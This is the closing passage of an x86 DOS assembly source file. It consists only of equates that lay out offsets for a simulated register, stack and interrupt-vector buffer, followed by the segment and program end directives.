875. temp_es     = simulate_buffer + 16
876. return_address  = temp_es + 2
877. temp_sp     = return_address + 2
878. tunnel_ip_ofs   = temp_sp + 2
879. int0_5_ip   = tunnel_ip_ofs + 2
880. int0_5_sip  = int0_5_ip + 2
881. int0_5_scs  = int0_5_sip + 2
882. _ip     = int0_5_scs + 2
883. _cs     = _ip + 2
884. _ds     = _cs + 2
885. stack_bottom    = _ds + 2
886. _ax     = stack_bottom
887. _bx     = _ax + 2
888. _cx     = _bx + 2
889. _dx     = _cx + 2
890. _si     = _dx + 2
891. _di     = _si + 2
892. _bp     = _di + 2
893. _es     = _bp + 2
894. flags       = _es + 2
895. stack_top   = flags + 2
896. _ss     = stack_top
897. _sp     = _ss + 2
898. test_exit   = _sp + 2
899. ends    code
900. end start